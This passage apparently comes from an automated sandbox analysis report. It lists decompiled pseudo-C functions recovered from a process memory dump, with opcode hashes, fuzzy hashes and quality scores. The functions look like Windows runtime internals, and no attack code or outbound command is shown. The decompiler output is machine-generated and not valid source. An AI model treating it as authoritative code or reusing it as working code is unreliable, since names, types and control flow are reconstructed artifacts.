                                        							E05469D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                        							_t31 = 1;
                                        							goto L7;
                                        						}
                                        						E0539F7C0(_t52, _v12, _t52, 0);
                                        						if(_t64 != 0) {
                                        							 *_t64 = _t49;
                                        							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                        						}
                                        						L12:
                                        						_t31 = 1;
                                        						goto L7;
                                        					}
                                        					if(_t61 != 0) {
                                        						 *_t61 = _t51;
                                        						_t61[1] = _t54;
                                        					}
                                        					goto L12;
                                        				} else {
                                        					goto L6;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • Opcode ID: ad976aaaacc7313f1510dc32ce30ede46c31630ede1adc4a50b5de9a30604ea0
                                        • Instruction ID: 64eda83d9577c9e76751def98ca9def9d9203ce0c3049397bc57c438cd0fa04f
                                        • Opcode Fuzzy Hash: ad976aaaacc7313f1510dc32ce30ede46c31630ede1adc4a50b5de9a30604ea0
                                        • Instruction Fuzzy Hash: 71317C716097018FD720DF1DC841B66BBE9FB88B10F1549BEE99697391D7B0E804CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E0539AA16(signed short* __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				signed short _v16;
                                        				intOrPtr _v20;
                                        				signed short _v24;
                                        				signed short _v28;
                                        				void* _v32;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t25;
                                        				signed short _t38;
                                        				signed short* _t42;
                                        				signed int _t44;
                                        				signed short* _t52;
                                        				signed short _t53;
                                        				signed int _t54;
                                        
                                        				_v8 =  *0x548d360 ^ _t54;
                                        				_t42 = __ecx;
                                        				_t44 =  *__ecx & 0x0000ffff;
                                        				_t52 =  &(__ecx[2]);
                                        				_t51 = _t44 + 2;
                                        				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                        					L4:
                                        					_t25 =  *0x5487b9c; // 0x0
                                        					_t53 = L053B4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                        					__eflags = _t53;
                                        					if(_t53 == 0) {
                                        						L3:
                                        						return E053DB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                        					} else {
                                        						E053DF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                        						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                        						L2:
                                        						_t51 = 4;
                                        						if(L053A6C59(_t53, _t51, _t58) != 0) {
                                        							_t28 = E053C5E50(0x537c338, 0, 0,  &_v32);
                                        							__eflags = _t28;
                                        							if(_t28 == 0) {
                                        								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                        								__eflags = _t38;
                                        								_v24 = _t53;
                                        								_v16 = _t38;
                                        								_v20 = 0;
                                        								_v12 = 0;
                                        								E053CB230(_v32, _v28, 0x537c2d8, 1,  &_v24);
                                        								_t28 = E0539F7A0(_v32, _v28);
                                        							}
                                        							__eflags = _t53 -  *_t52;
                                        							if(_t53 !=  *_t52) {
                                        								_t28 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                        							}
                                        						}
                                        						goto L3;
                                        					}
                                        				}
                                        				_t53 =  *_t52;
                                        				_t44 = _t44 >> 1;
                                        				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                        				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                        					goto L4;
                                        				}
                                        				goto L2;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • Opcode ID: ccc69d20f4c4e4a9c113c01af0660c93d971adf9b34a5d94b60da56b6eb1b5f5
                                        • Instruction ID: ddf45665032d80e9b60ea8d001da92f820bc392623ca3047e2a9215382ccc52d
                                        • Opcode Fuzzy Hash: ccc69d20f4c4e4a9c113c01af0660c93d971adf9b34a5d94b60da56b6eb1b5f5
                                        • Instruction Fuzzy Hash: 6F31E3B2A00219ABDF15EF64CD82ABFB7B9FF04700B054069F901E7150EB799D11DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E053D8EC7(void* __ecx, void* __edx) {
                                        				signed int _v8;
                                        				signed int* _v16;
                                        				intOrPtr _v20;
                                        				signed int* _v24;
                                        				char* _v28;
                                        				signed int* _v32;
                                        				intOrPtr _v36;
                                        				signed int* _v40;
                                        				signed int* _v44;
                                        				signed int* _v48;
                                        				intOrPtr _v52;
                                        				signed int* _v56;
                                        				signed int* _v60;
                                        				signed int* _v64;
                                        				intOrPtr _v68;
                                        				signed int* _v72;
                                        				char* _v76;
                                        				signed int* _v80;
                                        				signed int _v84;
                                        				signed int* _v88;
                                        				intOrPtr _v92;
                                        				signed int* _v96;
                                        				intOrPtr _v100;
                                        				signed int* _v104;
                                        				signed int* _v108;
                                        				char _v140;
                                        				signed int _v144;
                                        				signed int _v148;
                                        				signed int* _v152;
                                        				char _v156;
                                        				signed int* _v160;
                                        				char _v164;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t67;
                                        				intOrPtr _t70;
                                        				void* _t71;
                                        				void* _t72;
                                        				signed int _t73;
                                        
                                        				_t69 = __edx;
                                        				_v8 =  *0x548d360 ^ _t73;
                                        				_t48 =  *[fs:0x30];
                                        				_t72 = __edx;
                                        				_t71 = __ecx;
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                        					_t48 = E053C4E70(0x54886e4, 0x53d9490, 0, 0);
                                        					if( *0x54853e8 > 5 && E053D8F33(0x54853e8, 0, 0x2000) != 0) {
                                        						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                        						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                        						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                        						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                        						_v108 =  &_v84;
                                        						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                        						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                        						_v76 =  &_v156;
                                        						_t70 = 8;
                                        						_v60 =  &_v144;
                                        						_t67 = 4;
                                        						_v44 =  &_v148;
                                        						_v152 = 0;
                                        						_v160 = 0;
                                        						_v104 = 0;
                                        						_v100 = 2;
                                        						_v96 = 0;
                                        						_v88 = 0;
                                        						_v80 = 0;
                                        						_v72 = 0;
                                        						_v68 = _t70;
                                        						_v64 = 0;
                                        						_v56 = 0;
                                        						_v52 = 0x54853e8;
                                        						_v48 = 0;
                                        						_v40 = 0;
                                        						_v36 = 0x54853e8;
                                        						_v32 = 0;
                                        						_v28 =  &_v164;
                                        						_v24 = 0;
                                        						_v20 = _t70;
                                        						_v16 = 0;
                                        						_t69 = 0x537bc46;
                                        						_t48 = E05417B9C(0x54853e8, 0x537bc46, _t67, 0x54853e8, _t70,  &_v140);
                                        					}
                                        				}
                                        				return E053DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • Opcode ID: e3d1d14308dcec423652625662dc8d6394638de711dc332d012b2fb7a3cca46f
                                        • Instruction ID: 2eaeb7527edb1210871195f7932e7f682a6de22dd4c7708d2e8268926876b5d5
                                        • Opcode Fuzzy Hash: e3d1d14308dcec423652625662dc8d6394638de711dc332d012b2fb7a3cca46f
                                        • Instruction Fuzzy Hash: 1441A2B1D003189EDB24CFAAE981AEDFBF9FB48710F9041AEE509A7641D7705A44CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E053CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                        				intOrPtr* _v0;
                                        				signed char _v4;
                                        				signed int _v8;
                                        				void* __ecx;
                                        				void* __ebp;
                                        				void* _t37;
                                        				intOrPtr _t38;
                                        				signed int _t44;
                                        				signed char _t52;
                                        				void* _t54;
                                        				intOrPtr* _t56;
                                        				void* _t58;
                                        				char* _t59;
                                        				signed int _t62;
                                        
                                        				_t58 = __edx;
                                        				_push(0);
                                        				_push(4);
                                        				_push( &_v8);
                                        				_push(0x24);
                                        				_push(0xffffffff);
                                        				if(E053D9670() < 0) {
                                        					L053EDF30(_t54, _t58, _t35);
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					_push(_t54);
                                        					_t52 = _v4;
                                        					if(_t52 > 8) {
                                        						_t37 = 0xc0000078;
                                        					} else {
                                        						_t38 =  *0x5487b9c; // 0x0
                                        						_t62 = _t52 & 0x000000ff;
                                        						_t59 = L053B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                        						if(_t59 == 0) {
                                        							_t37 = 0xc0000017;
                                        						} else {
                                        							_t56 = _v0;
                                        							 *(_t59 + 1) = _t52;
                                        							 *_t59 = 1;
                                        							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                        							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                        							_t44 = _t62 - 1;
                                        							if(_t44 <= 7) {
                                        								switch( *((intOrPtr*)(_t44 * 4 +  &M053CE810))) {
                                        									case 0:
                                        										L6:
                                        										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                        										goto L7;
                                        									case 1:
                                        										L13:
                                        										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                        										goto L6;
                                        									case 2:
                                        										L12:
                                        										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                        										goto L13;
                                        									case 3:
                                        										L11:
                                        										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                        										goto L12;
                                        									case 4:
                                        										L10:
                                        										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                        										goto L11;
                                        									case 5:
                                        										L9:
                                        										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                        										goto L10;
                                        									case 6:
                                        										L17:
                                        										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                        										goto L9;
                                        									case 7:
                                        										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                        										goto L17;
                                        								}
                                        							}
                                        							L7:
                                        							 *_a40 = _t59;
                                        							_t37 = 0;
                                        						}
                                        					}
                                        					return _t37;
                                        				} else {
                                        					_push(0x20);
                                        					asm("ror eax, cl");
                                        					return _a4 ^ _v8;
                                        				}
                                        			}


















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 056632fee38f053bd399ece51f68f2199e9d863a931d504a5f85b907af6ac035
                                        • Instruction ID: 8d565d8975a1b939a0335b51724a8b379d80333b88665e984c6a1d7ed83a8725
                                        • Opcode Fuzzy Hash: 056632fee38f053bd399ece51f68f2199e9d863a931d504a5f85b907af6ac035
                                        • Instruction Fuzzy Hash: B831A075A14249EFD705CF58D845F9ABBE8FB08314F1482AAF904CB741D671ED80DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E053CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t41;
                                        				intOrPtr _t51;
                                        
                                        				_t51 =  *0x5486100; // 0x16
                                        				_v12 = __edx;
                                        				_v8 = __ecx;
                                        				if(_t51 >= 0x800) {
                                        					L12:
                                        					return 0;
                                        				} else {
                                        					goto L1;
                                        				}
                                        				while(1) {
                                        					L1:
                                        					_t22 = _t51;
                                        					asm("lock cmpxchg [ecx], edx");
                                        					if(_t51 == _t22) {
                                        						break;
                                        					}
                                        					_t51 = _t22;
                                        					if(_t22 < 0x800) {
                                        						continue;
                                        					}
                                        					goto L12;
                                        				}
                                        				E053B2280(0xd, 0x1a69f1a0);
                                        				_t41 =  *0x54860f8; // 0x0
                                        				if(_t41 != 0) {
                                        					 *0x54860f8 =  *_t41;
                                        					 *0x54860fc =  *0x54860fc + 0xffff;
                                        				}
                                        				E053AFFB0(_t41, 0x800, 0x1a69f1a0);
                                        				if(_t41 != 0) {
                                        					L6:
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                        					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                        					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                        					do {
                                        						asm("lock xadd [0x54860f0], ax");
                                        						 *((short*)(_t41 + 0x34)) = 1;
                                        					} while (1 == 0);
                                        					goto L8;
                                        				} else {
                                        					_t41 = L053B4620(0x5486100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                        					if(_t41 == 0) {
                                        						L11:
                                        						asm("lock dec dword [0x5486100]");
                                        						L8:
                                        						return _t41;
                                        					}
                                        					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                        					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                        					if(_t41 == 0) {
                                        						goto L11;
                                        					}
                                        					goto L6;
                                        				}
                                        			}











                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d506764be3307d4a3d4beb8da983e4bea05c52fb49a091f7e9ee3a60876c103d
                                        • Instruction ID: e1cee1e05fc34c177e7813e2226c175ff540810cfd522c21c8cf9288e7099033
                                        • Opcode Fuzzy Hash: d506764be3307d4a3d4beb8da983e4bea05c52fb49a091f7e9ee3a60876c103d
                                        • Instruction Fuzzy Hash: A2312136A106119BCB41EF58D482BFABBB9FB28310F4180BDED45DB241EB78DD058B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E05399100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                        				signed int _t53;
                                        				signed int _t56;
                                        				signed int* _t60;
                                        				signed int _t63;
                                        				signed int _t66;
                                        				signed int _t69;
                                        				void* _t70;
                                        				intOrPtr* _t72;
                                        				void* _t78;
                                        				void* _t79;
                                        				signed int _t80;
                                        				intOrPtr _t82;
                                        				void* _t85;
                                        				void* _t88;
                                        				void* _t89;
                                        
                                        				_t84 = __esi;
                                        				_t70 = __ecx;
                                        				_t68 = __ebx;
                                        				_push(0x2c);
                                        				_push(0x546f6e8);
                                        				E053ED0E8(__ebx, __edi, __esi);
                                        				 *((char*)(_t85 - 0x1d)) = 0;
                                        				_t82 =  *((intOrPtr*)(_t85 + 8));
                                        				if(_t82 == 0) {
                                        					L4:
                                        					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                        						E054688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                        					}
                                        					L5:
                                        					return E053ED130(_t68, _t82, _t84);
                                        				}
                                        				_t88 = _t82 -  *0x54886c0; // 0x32f07b0
                                        				if(_t88 == 0) {
                                        					goto L4;
                                        				}
                                        				_t89 = _t82 -  *0x54886b8; // 0x0
                                        				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					goto L4;
                                        				} else {
                                        					E053B2280(_t82 + 0xe0, _t82 + 0xe0);
                                        					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                        					__eflags =  *((char*)(_t82 + 0xe5));
                                        					if(__eflags != 0) {
                                        						E054688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                        						goto L12;
                                        					} else {
                                        						__eflags =  *((char*)(_t82 + 0xe4));
                                        						if( *((char*)(_t82 + 0xe4)) == 0) {
                                        							 *((char*)(_t82 + 0xe4)) = 1;
                                        							_push(_t82);
                                        							_push( *((intOrPtr*)(_t82 + 0x24)));
                                        							E053DAFD0();
                                        						}
                                        						while(1) {
                                        							_t60 = _t82 + 8;
                                        							 *(_t85 - 0x2c) = _t60;
                                        							_t68 =  *_t60;
                                        							_t80 = _t60[1];
                                        							 *(_t85 - 0x28) = _t68;
                                        							 *(_t85 - 0x24) = _t80;
                                        							while(1) {
                                        								L10:
                                        								__eflags = _t80;
                                        								if(_t80 == 0) {
                                        									break;
                                        								}
                                        								_t84 = _t68;
                                        								 *(_t85 - 0x30) = _t80;
                                        								 *(_t85 - 0x24) = _t80 - 1;
                                        								asm("lock cmpxchg8b [edi]");
                                        								_t68 = _t84;
                                        								 *(_t85 - 0x28) = _t68;
                                        								 *(_t85 - 0x24) = _t80;
                                        								__eflags = _t68 - _t84;
                                        								_t82 =  *((intOrPtr*)(_t85 + 8));
                                        								if(_t68 != _t84) {
                                        									continue;
                                        								}
                                        								__eflags = _t80 -  *(_t85 - 0x30);
                                        								if(_t80 !=  *(_t85 - 0x30)) {
                                        									continue;
                                        								}
                                        								__eflags = _t80;
                                        								if(_t80 == 0) {
                                        									break;
                                        								}
                                        								_t63 = 0;
                                        								 *(_t85 - 0x34) = 0;
                                        								_t84 = 0;
                                        								__eflags = 0;
                                        								while(1) {
                                        									 *(_t85 - 0x3c) = _t84;
                                        									__eflags = _t84 - 3;
                                        									if(_t84 >= 3) {
                                        										break;
                                        									}
                                        									__eflags = _t63;
                                        									if(_t63 != 0) {
                                        										L40:
                                        										_t84 =  *_t63;
                                        										__eflags = _t84;
                                        										if(_t84 != 0) {
                                        											_t84 =  *(_t84 + 4);
                                        											__eflags = _t84;
                                        											if(_t84 != 0) {
                                        												 *0x548b1e0(_t63, _t82);
                                        												 *_t84();
                                        											}
                                        										}
                                        										do {
                                        											_t60 = _t82 + 8;
                                        											 *(_t85 - 0x2c) = _t60;
                                        											_t68 =  *_t60;
                                        											_t80 = _t60[1];
                                        											 *(_t85 - 0x28) = _t68;
                                        											 *(_t85 - 0x24) = _t80;
                                        											goto L10;
                                        										} while (_t63 == 0);
                                        										goto L40;
                                        									}
                                        									_t69 = 0;
                                        									__eflags = 0;
                                        									while(1) {
                                        										 *(_t85 - 0x38) = _t69;
                                        										__eflags = _t69 -  *0x54884c0;
                                        										if(_t69 >=  *0x54884c0) {
                                        											break;
                                        										}
                                        										__eflags = _t63;
                                        										if(_t63 != 0) {
                                        											break;
                                        										}
                                        										_t66 = E05469063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                        										__eflags = _t66;
                                        										if(_t66 == 0) {
                                        											_t63 = 0;
                                        											__eflags = 0;
                                        										} else {
                                        											_t63 = _t66 + 0xfffffff4;
                                        										}
                                        										 *(_t85 - 0x34) = _t63;
                                        										_t69 = _t69 + 1;
                                        									}
                                        									_t84 = _t84 + 1;
                                        								}
                                        								__eflags = _t63;
                                        							}
                                        							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                        							 *((char*)(_t82 + 0xe5)) = 1;
                                        							 *((char*)(_t85 - 0x1d)) = 1;
                                        							L12:
                                        							 *(_t85 - 4) = 0xfffffffe;
                                        							E0539922A(_t82);
                                        							_t53 = E053B7D50();
                                        							__eflags = _t53;
                                        							if(_t53 != 0) {
                                        								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        							} else {
                                        								_t56 = 0x7ffe0386;
                                        							}
                                        							__eflags =  *_t56;
                                        							if( *_t56 != 0) {
                                        								_t56 = E05468B58(_t82);
                                        							}
                                        							__eflags =  *((char*)(_t85 - 0x1d));
                                        							if( *((char*)(_t85 - 0x1d)) != 0) {
                                        								__eflags = _t82 -  *0x54886c0; // 0x32f07b0
                                        								if(__eflags != 0) {
                                        									__eflags = _t82 -  *0x54886b8; // 0x0
                                        									if(__eflags == 0) {
                                        										_t79 = 0x54886bc;
                                        										_t72 = 0x54886b8;
                                        										goto L18;
                                        									}
                                        									__eflags = _t56 | 0xffffffff;
                                        									asm("lock xadd [edi], eax");
                                        									if(__eflags == 0) {
                                        										E05399240(_t68, _t82, _t82, _t84, __eflags);
                                        									}
                                        								} else {
                                        									_t79 = 0x54886c4;
                                        									_t72 = 0x54886c0;
                                        									L18:
                                        									E053C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                        								}
                                        							}
                                        							goto L5;
                                        						}
                                        					}
                                        				}
                                        			}


















                                        0x053991cd
                                        0x053991cd
                                        0x053991cd
                                        0x053991d2
                                        0x053991d5
                                        0x05399239
                                        0x05399239
                                        0x053991d7
                                        0x053991db
                                        0x053991e1
                                        0x053991e7
                                        0x053991fd
                                        0x05399203
                                        0x0539921e
                                        0x05399223
                                        0x00000000
                                        0x05399223
                                        0x05399205
                                        0x05399208
                                        0x0539920c
                                        0x05399214
                                        0x05399214
                                        0x053991e9
                                        0x053991e9
                                        0x053991ee
                                        0x053991f3
                                        0x053991f3
                                        0x053991f3
                                        0x053991e7
                                        0x00000000
                                        0x053991db
                                        0x05399187
                                        0x05399168

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 756e88c6d5456c4387ef66f67dde43556ea6783c3c0a2e1997dee7add67109a7
                                        • Instruction ID: e87005f807b23c0639b6dbef17ed8a47ac5f1c4ddcc690bd47dfb4dcfe09f6db
                                        • Opcode Fuzzy Hash: 756e88c6d5456c4387ef66f67dde43556ea6783c3c0a2e1997dee7add67109a7
                                        • Instruction Fuzzy Hash: C031C2B6A05285DFDF29DF68C488BECBBF6BB88350F18854ED40567251C3B4A980CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E053C1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr* _v20;
                                        				void* _t22;
                                        				char _t23;
                                        				void* _t36;
                                        				intOrPtr _t42;
                                        				intOrPtr _t43;
                                        
                                        				_v12 = __ecx;
                                        				_t43 = 0;
                                        				_v20 = __edx;
                                        				_t42 =  *__edx;
                                        				 *__edx = 0;
                                        				_v16 = _t42;
                                        				_push( &_v8);
                                        				_push(0);
                                        				_push(0);
                                        				_push(6);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                        				_push(_t36);
                                        				_t22 = E053BF460();
                                        				if(_t22 < 0) {
                                        					if(_t22 == 0xc0000023) {
                                        						goto L1;
                                        					}
                                        					L3:
                                        					return _t43;
                                        				}
                                        				L1:
                                        				_t23 = _v8;
                                        				if(_t23 != 0) {
                                        					_t38 = _a4;
                                        					if(_t23 >  *_a4) {
                                        						_t42 = L053B4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                        						if(_t42 == 0) {
                                        							goto L3;
                                        						}
                                        						_t23 = _v8;
                                        					}
                                        					_push( &_v8);
                                        					_push(_t23);
                                        					_push(_t42);
                                        					_push(6);
                                        					_push(_t43);
                                        					_push(_v12);
                                        					_push(_t36);
                                        					if(E053BF460() < 0) {
                                        						if(_t42 != 0 && _t42 != _v16) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                        						}
                                        						goto L3;
                                        					}
                                        					 *_v20 = _t42;
                                        					 *_a4 = _v8;
                                        				}
                                        				_t43 = 1;
                                        				goto L3;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                        • Instruction ID: 6e9dc2f6fcf8c855e6fce73c8f265a7cdff70a75d489594d922d526fb69ee81b
                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                        • Instruction Fuzzy Hash: 3D218172A00119FFD721CF69CC84EABBBBDFF86640F11409AE905D7611D674AE11EBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E053B0050(void* __ecx) {
                                        				signed int _v8;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr* _t30;
                                        				intOrPtr* _t31;
                                        				signed int _t34;
                                        				void* _t40;
                                        				void* _t41;
                                        				signed int _t44;
                                        				intOrPtr _t47;
                                        				signed int _t58;
                                        				void* _t59;
                                        				void* _t61;
                                        				void* _t62;
                                        				signed int _t64;
                                        
                                        				_push(__ecx);
                                        				_v8 =  *0x548d360 ^ _t64;
                                        				_t61 = __ecx;
                                        				_t2 = _t61 + 0x20; // 0x20
                                        				E053C9ED0(_t2, 1, 0);
                                        				_t52 =  *(_t61 + 0x8c);
                                        				_t4 = _t61 + 0x8c; // 0x8c
                                        				_t40 = _t4;
                                        				do {
                                        					_t44 = _t52;
                                        					_t58 = _t52 & 0x00000001;
                                        					_t24 = _t44;
                                        					asm("lock cmpxchg [ebx], edx");
                                        					_t52 = _t44;
                                        				} while (_t52 != _t44);
                                        				if(_t58 == 0) {
                                        					L7:
                                        					_pop(_t59);
                                        					_pop(_t62);
                                        					_pop(_t41);
                                        					return E053DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                        				}
                                        				asm("lock xadd [esi], eax");
                                        				_t47 =  *[fs:0x18];
                                        				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                        				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                        				if(_t30 != 0) {
                                        					if( *_t30 == 0) {
                                        						goto L4;
                                        					}
                                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        					L5:
                                        					if( *_t31 != 0) {
                                        						_t18 = _t61 + 0x78; // 0x78
                                        						E05468A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                        					}
                                        					_t52 =  *(_t61 + 0x5c);
                                        					_t11 = _t61 + 0x78; // 0x78
                                        					_t34 = E053C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                        					_t24 = _t34 | 0xffffffff;
                                        					asm("lock xadd [esi], eax");
                                        					if((_t34 | 0xffffffff) == 0) {
                                        						 *0x548b1e0(_t61);
                                        						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                        					}
                                        					goto L7;
                                        				}
                                        				L4:
                                        				_t31 = 0x7ffe0386;
                                        				goto L5;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2b6de5621fa872afa64d2e15aa855107bf4acd67023bed295499954fb800239
